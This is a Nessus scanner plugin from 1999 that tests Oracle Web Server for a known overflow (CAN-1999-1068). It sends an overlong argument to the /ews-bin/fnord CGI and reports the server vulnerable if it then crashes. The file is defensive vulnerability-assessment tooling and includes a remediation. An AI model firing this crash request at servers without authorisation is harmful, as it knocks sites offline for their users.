home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ows_overflow.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.0 KB  |  85 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10171);
  10.  script_version ("$Revision: 1.20 $");
  11.  script_cve_id("CAN-1999-1068");
  12.  
  13.  name["english"] = "Oracle Web Server denial of Service";
  14.  name["francais"] = "DΘni de service contre le serveur web d'Oracle";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. It was possible to make the remote
  19. web server crash by supplying a too
  20. long argument to the cgi
  21. /ews-bin/fnord.
  22.  
  23.  
  24. An attacker may use this flaw to prevent
  25. your customers to access your web site.
  26.  
  27. Solution : remove this CGI.
  28.  
  29. Risk factor : High";
  30.  
  31.  desc["francais"] = "
  32. Il s'est avΘrΘ possible de faire planter
  33. le serveur Web distant en donnant un 
  34. argument trop long au CGI
  35. /ews-bin/fnord.
  36.  
  37. Un pirate peut utiliser ce problΦme pour
  38. empecher vos clients d'accΘder α votre
  39. site web.
  40.  
  41. Solution : retirez ce CGI.
  42.  
  43. Facteur de risque : SΘrieux";
  44.  
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes the remote OWS";
  49.  summary["francais"] = "Fait planter le OWS distant";
  50.  
  51.  script_summary(english:summary["english"], francais:summary["francais"]);
  52.  
  53.  script_category(ACT_DENIAL);
  54.  
  55.  
  56.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  57.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  58.  family["english"] = "Denial of Service";
  59.  family["francais"] = "DΘni de service";
  60.  script_family(english:family["english"], francais:family["francais"]);
  61.  script_dependencie("find_service.nes", "no404.nasl");
  62.  script_require_ports("Services/www", 80);
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70. include("http_func.inc");
  71. include("http_keepalive.inc");
  72. port = get_http_port(default:80);
  73.  
  74. res = is_cgi_installed_ka(item:"/ews-bin/fnord", port:port);
  75. if(res)
  76. {
  77.   request = string("/ews-bin/fnord?foo=", crap(2048));
  78.   is_cgi_installed_ka(item:request, port:port);
  79.   sleep(5);
  80.   soc = open_sock_tcp(port);
  81.   if(!soc)security_hole(port);
  82.   else close(soc);
  83. }
  84.  
  85.